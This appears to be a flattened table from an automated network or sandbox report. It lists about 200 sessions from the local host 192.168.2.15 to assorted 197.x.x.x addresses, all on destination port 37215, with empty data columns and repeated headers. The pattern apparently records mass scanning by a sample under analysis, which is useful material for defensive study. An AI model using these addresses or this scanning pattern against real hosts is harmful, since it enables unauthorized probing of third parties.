                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21565192.168.2.1551676197.68.197.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21566192.168.2.1559888197.255.23.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21567192.168.2.1537678197.23.152.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21568192.168.2.1551738197.249.116.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21569192.168.2.1555614197.33.238.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21570192.168.2.1556070197.117.50.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21571192.168.2.1546922197.45.4.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21572192.168.2.1546186197.73.227.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21573192.168.2.1543314197.40.131.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21574192.168.2.1533412197.225.150.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21575192.168.2.1536462197.148.179.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21576192.168.2.1558430197.226.244.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21577192.168.2.1539016197.65.64.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21578192.168.2.1539820197.18.149.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21579192.168.2.1540290197.183.47.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21580192.168.2.1554396197.150.174.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21581192.168.2.1549074197.68.82.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21582192.168.2.1546950197.249.107.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21583192.168.2.1554920197.112.76.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21584192.168.2.1534760197.107.92.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21585192.168.2.1560778197.17.241.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21586192.168.2.1547934197.57.31.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21587192.168.2.1555424197.122.233.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21588192.168.2.1556712197.167.58.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21589192.168.2.1540596197.210.214.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21590192.168.2.1556686197.245.126.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21591192.168.2.1540920197.106.245.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21592192.168.2.1534070197.127.162.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21593192.168.2.1546058197.203.206.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21594192.168.2.1542820197.69.73.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21595192.168.2.1533304197.47.217.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21596192.168.2.1542784197.52.110.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21597192.168.2.1559634197.35.95.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21598192.168.2.1547474197.127.229.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21599192.168.2.1557586197.184.117.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21600192.168.2.1548544197.232.224.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21601192.168.2.1537086197.66.203.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21602192.168.2.1547426197.166.115.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21603192.168.2.1559200197.41.26.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21604192.168.2.1536806197.214.5.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21605192.168.2.1545326197.166.46.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21606192.168.2.1543622197.60.102.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21607192.168.2.1547432197.12.183.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21608192.168.2.1552786197.69.23.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21609192.168.2.1534858197.151.32.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21610192.168.2.1560684197.202.158.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21611192.168.2.1555884197.251.115.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21612192.168.2.1538360197.37.139.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21613192.168.2.1560204197.10.12.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21614192.168.2.1552828197.128.162.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21615192.168.2.1556754197.246.252.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21616192.168.2.1560214197.141.36.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21617192.168.2.1539026197.117.48.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21618192.168.2.1545784197.67.221.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21619192.168.2.1554618197.239.219.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21620192.168.2.1559790197.100.203.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21621192.168.2.1542218197.235.173.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21622192.168.2.1541804197.247.99.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21623192.168.2.1560492197.253.189.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21624192.168.2.1545436197.2.122.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21625192.168.2.1538662197.205.237.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21626192.168.2.1533690197.240.198.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21627192.168.2.1539058197.242.167.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21628192.168.2.1540264197.204.60.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21629192.168.2.1544500197.157.182.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21630192.168.2.1550440197.196.206.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21631192.168.2.1555656197.228.233.25537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21632192.168.2.1544934197.183.88.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21633192.168.2.1534826197.246.34.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21634192.168.2.1551870197.198.123.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21635192.168.2.1544882197.163.203.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21636192.168.2.1555834197.43.185.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21637192.168.2.1555720197.100.184.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21638192.168.2.1556636197.4.50.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21639192.168.2.1543468197.143.39.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21640192.168.2.1546450197.222.146.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21641192.168.2.1551062197.60.200.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21642192.168.2.1545052197.53.112.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21643192.168.2.1539954197.44.26.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21644192.168.2.1559910197.6.54.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21645192.168.2.1535138197.242.119.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21646192.168.2.1537008197.38.160.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21647192.168.2.1560668197.250.23.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21648192.168.2.1539438197.2.40.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21649192.168.2.1536328197.58.7.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21650192.168.2.1549252197.59.23.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21651192.168.2.1542352197.168.87.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21652192.168.2.1547578197.100.107.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21653192.168.2.1552320197.126.84.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21654192.168.2.1552364197.212.72.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21655192.168.2.1541228197.159.205.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21656192.168.2.1537024197.165.108.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21657192.168.2.1556094197.61.125.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21658192.168.2.1538282197.133.119.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21659192.168.2.1545784197.47.0.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21660192.168.2.1553062197.94.123.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21661192.168.2.1536166197.136.214.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21662192.168.2.1544638197.204.113.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21663192.168.2.1538330197.179.190.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21664192.168.2.1546828197.141.163.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21665192.168.2.1548970197.243.199.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21666192.168.2.1535852197.102.129.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21667192.168.2.1556476197.183.58.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21668192.168.2.1551608197.107.165.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21669192.168.2.1547996197.90.254.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21670192.168.2.1552210197.114.106.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21671192.168.2.1539158197.88.135.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21672192.168.2.1550372197.35.170.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21673192.168.2.1537532197.235.93.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21674192.168.2.1534040197.207.68.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21675192.168.2.1559362197.250.22.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21676192.168.2.1533578197.75.131.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21677192.168.2.1554932197.102.71.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21678192.168.2.1544344197.89.166.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21679192.168.2.1534488197.29.156.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21680192.168.2.1558410197.97.50.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21681192.168.2.1548260197.170.145.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21682192.168.2.1548084197.204.24.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21683192.168.2.1547482197.207.122.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21684192.168.2.1534890197.223.17.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21685192.168.2.1538696197.69.86.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21686192.168.2.1534446197.44.58.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21687192.168.2.1540206197.114.27.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21688192.168.2.1533598197.221.184.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21689192.168.2.1551074197.171.118.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21690192.168.2.1552222197.184.17.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21691192.168.2.1534490197.13.156.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21692192.168.2.1550980197.70.239.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21693192.168.2.1551390197.85.242.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21694192.168.2.1553798197.36.34.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21695192.168.2.1551158197.107.162.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21696192.168.2.1543986197.248.17.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21697192.168.2.1549070197.23.188.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21698192.168.2.1548722197.173.203.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21699192.168.2.1544136197.158.166.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21700192.168.2.1557386197.72.140.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21701192.168.2.1551526197.164.68.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21702192.168.2.1537304197.53.48.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21703192.168.2.1558994197.61.208.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21704192.168.2.1552370197.179.30.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21705192.168.2.1539694197.65.10.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21706192.168.2.1536080197.175.188.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21707192.168.2.1559228197.244.106.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21708192.168.2.1555906197.220.110.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21709192.168.2.1535088197.49.28.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21710192.168.2.1539258197.104.160.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21711192.168.2.1547328197.225.31.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21712192.168.2.1555758197.186.45.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21713192.168.2.1559014197.205.246.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21714192.168.2.1558790197.45.0.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21715192.168.2.1551398197.222.234.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21716192.168.2.1544772197.77.67.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21717192.168.2.1560146197.53.101.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21718192.168.2.1557510197.35.148.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21719192.168.2.1537412197.182.69.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21720192.168.2.1549876197.219.3.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21721192.168.2.1541070197.58.208.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21722192.168.2.1537752197.238.9.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21723192.168.2.1554766197.112.16.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21724192.168.2.1539076197.42.56.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21725192.168.2.1541938197.113.218.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21726192.168.2.1537026197.124.113.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21727192.168.2.1534654197.167.109.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21728192.168.2.1537146197.21.47.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21729192.168.2.1542668197.136.102.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21730192.168.2.1544792197.102.131.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21731192.168.2.1537132197.3.94.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21732192.168.2.1556332197.146.53.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21733192.168.2.1534210197.85.230.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21734192.168.2.1535218197.139.172.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21735192.168.2.1546014197.152.37.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21736192.168.2.1553570197.76.162.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21737192.168.2.1532860197.249.140.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21738192.168.2.1536076197.212.179.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21739192.168.2.1540682197.218.186.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21740192.168.2.1535098197.190.100.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21741192.168.2.1547716197.187.157.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21742192.168.2.1558814197.29.86.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21743192.168.2.1559612197.222.106.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21744192.168.2.1555980197.15.72.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21745192.168.2.1556912197.148.173.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21746192.168.2.1545082197.159.30.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21747192.168.2.1549870197.20.28.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21748192.168.2.1536486197.214.232.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21749192.168.2.1552950197.146.8.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21750192.168.2.1535650197.144.7.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21751192.168.2.1537498197.98.180.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21752192.168.2.1544534197.55.253.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21753192.168.2.1547288197.218.87.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21754192.168.2.1538490197.174.74.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21755192.168.2.1548202197.62.216.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21756192.168.2.1556590197.125.128.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21757192.168.2.1556414197.153.176.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21758192.168.2.1542474197.202.238.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21759192.168.2.1542374197.250.223.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21760192.168.2.1538376197.38.80.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21761192.168.2.1532862197.102.235.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21762192.168.2.1542336197.251.146.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21763192.168.2.1540364197.34.234.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21764192.168.2.1556250197.172.184.18937215
